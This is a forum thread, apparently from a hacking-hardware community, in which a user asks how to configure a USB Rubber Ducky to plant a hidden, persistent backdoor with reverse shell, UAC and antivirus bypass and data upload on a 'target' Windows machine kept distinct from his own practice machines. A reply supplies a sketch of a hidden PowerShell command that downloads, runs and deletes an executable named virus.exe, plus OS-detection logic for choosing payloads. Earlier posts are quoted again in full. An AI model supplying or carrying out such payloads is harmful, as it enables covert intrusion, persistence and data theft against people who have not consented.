Jump to content

First Duck (suggest script)


Recommended Posts

Hi, I am about to order the rubber ducky and this is what I understand so far (please answer,quote if I am wrong)


1. I order the rubber-ducky usb device online at the shop.
Maybe I will have 2...


2. There is a "general" /universal script language standard utility that lets people customize the socalled payload*
Among a community around it.


3. I am not sure thou, If I have to choose it at the shop (prepared with script) if this takes extra time.
or if this choice "locks" my duck for future agility..


4. There is some tools required for reading-writing to the internal sd-storage on this device.
If you want to access it, it has to be flashed. And when the payloads and such data is there you want to "seal" the device and make it ready (for deploy...)


5. The thing about this HID-injection on let say @Windows could be described as follow:

when the device attaches in usb-port it get granted access as a hid-keyboard.
opens notepad if the target machine is logged in.
dumps a lot of text "payload" and saves it.
call elevated command-prompt /and or powershell if available.
runs whatever you want^^ like open port or disable firewall
deletes traces of itself, runMRUs , recent doc, if possible
and this happens in seconds with fast typing, with some delays,...

finished


6. I Havent found out yet , if this device could be used as a normal "usb volume" at the same time!?

after the payload as a "HID" is done.
it mounts a tiny volume that is created on the internal SDcard
(prepared 2GB FAT partition for instance...)
Windows computer suddenly find out the active partition, mounts the volume.
and the User gets a normal "new removable device found"...
Maybe with some typical files on it, and nothing seems wrong with this penstick... :ph34r:

(but the payload has already done its job and also covers itself of a normal usb-drive )



What I want to do - Target machine - Thoughts -


1. Let say I (or you) only have one shot...one chance.
You have to construct the payload to be quite "failsafe" and smart right.

like
before_actionA check if system is target=true


if actionA doesnt work I try actionB.

before it even continues, if it fails at first line the rest is just useless, isnt it...
So you have construct a tiny payload that does a few commands in several ways to garantuee a success.
I believe you could have several different local stored "files" or configs ready to be used, all depending on the payload.

if=system is Mac =use payload_Z
if=unsure =kill itself


and so on..




2. So What do you suggest to me? I want to start as soon as possible guys.Help me out.
I gonna order 2 to start, one for a target and one for practise and use on my own machines for "pentesting"


Target client=windows x

I want the payload to do something like this:

a) open some backdoor as fast and safe as possible.
b) reverse shell and/or other remote solution
c) hide itself ,prepend and make sures it survives reboot, bypass UAC, bypass firewall, suspect users, AVs

d) minimal trace and ready to be hooked "picked-up-later" in other words.
e) listening...
f) for me, maybe send it new commands like information gathering (reco...)
g) new info uploaded to me (in a secure way!)
h) analyzing the results, I work out on new commands to send. very refined and precise













Link to post
Share on other sites

I had not read all your text (sorry, to much text for me haha :p) but what can I answer to you:

1. Ducky cames with a preinstalled firmware, you don´t have to flash anything

2. This firmware, loads a payload from the SD (called inject.bin) that you generate with a java file called encoder.jar, that converts payload.txt (any name) to inject.bin

3. The programing languaje is so simple, and works with any ducky firmware

4. Obviously, there are different firmwares, not only the stock one, there is one in special called "twin ducky" that alows you to use the microSD as mass storage at the same time it is also used for reading and loading the payloads (In this case, payloads can read also files in the microSD)

About the OS detection...

Nope, ducky can´t detect from Windows Mac or Linux, it can detect if windows is vista, 7, 8,10.. if Mac is X or Y (i don´t know about macs xD) etc...

In windows, you can do it with powershell script, you can also detect the architecture, just google it ("powershell detect os" something like that)

About failsafe..

In windows, as I said before, you can use powershell conditionals

Ex: if (architecture=32) {download 32b .exe) else {donwload 64b .exe} Just google it (Or wait a bit, Im going to make a tutorial in the few days)

About detection, hiding...

Again, Windows :wub: using powershell you can hide your script as simple as:

powershell -windowstyle hidden start cmd (this launchs a hidden powershell script that only starts another(visible) cmd window but I, for example, use it for downloading files without showing anything on screen)

Then (once file was downloaded and executed, I mean) you just have to erase it:

powershell -windowstyle hidden download(http://file.exe, %temp%\\virus.exe); Run %temp%\\virus.exe; Remove-Item %temp%\\virus.exe (This is an example, not actually the exact sintax)

And i think im done.

Hope I help you!

PD: Obviously, scripts can be changed, as I said they are stored into the microSD card so you can change them with your new ones when you want to.

Link to post
Share on other sites

I had not read all your text (sorry, to much text for me haha :p) but what can I answer to you:

2. This firmware, loads a payload from the SD (called inject.bin) that you generate with a java file called encoder.jar, that converts payload.txt (any name) to inject.bin

3. The programing languaje is so simple, and works with any ducky firmware

4. Obviously, there are different firmwares, not only the stock one, there is one in special called "twin ducky" that alows you to use the microSD as mass storage at the same time it is also used for reading and loading the payloads (In this case, payloads can read also files in the microSD)

About the OS detection...

Nope, ducky can´t detect from Windows Mac or Linux, it can detect if windows is vista, 7, 8,10.. if Mac is X or Y (i don´t know about macs xD) etc...

In windows, you can do it with powershell script, you can also detect the architecture, just google it ("powershell detect os" something like that)

About failsafe..

In windows, as I said before, you can use powershell conditionals

Ex: if (architecture=32) {download 32b .exe) else {donwload 64b .exe} Just google it (Or wait a bit, Im going to make a tutorial in the few days)

And i think im done.

Hope I help you!

PD: Obviously, scripts can be changed, as I said they are stored into the microSD card so you can change them with your new ones when you want to.

Hi

Yeah, sorry for long post...

1. So I use som tool or scripting"java" to edit and put my desired payload onto the ducks internal storage.

Do they ship them with or without payload?

2. The device must then be set to "inject mode" physical, right? or else it would be hard to connect it to my own computer for re-editing.

On-off switch or?

3. Or do you simple put som "active flag" to the ducky and it will attack at next mount...?

4. Maybe I dont get it, how the chip works/bus mode/connectors.

But does this usb-a connector and ducky only works as a HID, or could it fool the computer to also mount it as mass storage?

If you say the SD-card is local storage = makes sense, or else the payload couldnt exists in the first place.

But let say If I first of all make the ducky does it job as a hid-injector (like open backdoor)

Then the payload could also set a pre-pared partition on the sd-card flaged as active*

and a Windows computer would then suddenly pick it up and mount the volume as any other usb-pendrive

A sort of stealth/cover for the ducky i.e :ph34r:

5. So once for all, what payload do you recommend if I want to put some really nice,hidden,backdoor on a machine ?

*it`s prob windows

*It has to be run hidden

*It has to bypass/trick typical security as UAC, AV,

*It has to grant full access to the computer, open backdoor for secure remote-server attended access later on.

*It has to survive reboot, do socalled prepend migration?

*It has to be listening for new task (download commands )

*It has to be able to extract new tasks as above (more recogization)

*It has to make new uploading available, such as extended sysinfo, security,ports

I dont know if I cant wait, depends on if its best to order the ducky with payload or not ?

I look forward to your tutorial !

Link to post
Share on other sites

Hi

Yeah, sorry for long post...

1. So I use som tool or scripting"java" to edit and put my desired payload onto the ducks internal storage.

Do they ship them with or without payload?

2. The device must then be set to "inject mode" physical, right? or else it would be hard to connect it to my own computer for re-editing.

On-off switch or?

3. Or do you simple put som "active flag" to the ducky and it will attack at next mount...?

4. Maybe I dont get it, how the chip works/bus mode/connectors.

But does this usb-a connector and ducky only works as a HID, or could it fool the computer to also mount it as mass storage?

If you say the SD-card is local storage = makes sense, or else the payload couldnt exists in the first place.

But let say If I first of all make the ducky does it job as a hid-injector (like open backdoor)

Then the payload could also set a pre-pared partition on the sd-card flaged as active*

and a Windows computer would then suddenly pick it up and mount the volume as any other usb-pendrive

A sort of stealth/cover for the ducky i.e :ph34r:

5. So once for all, what payload do you recommend if I want to put some really nice,hidden,backdoor on a machine ?

*it`s prob windows

*It has to be run hidden

*It has to bypass/trick typical security as UAC, AV,

*It has to grant full access to the computer, open backdoor for secure remote-server attended access later on.

*It has to survive reboot, do socalled prepend migration?

*It has to be listening for new task (download commands )

*It has to be able to extract new tasks as above (more recogization)

*It has to make new uploading available, such as extended sysinfo, security,ports

I dont know if I cant wait, depends on if its best to order the ducky with payload or not ?

I look forward to your tutorial !

I made this post a while ago, it should help with the "run hidden" part:

https://forums.hak5.org/index.php?/topic/36589-extra-stealth-and-nircmd/

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...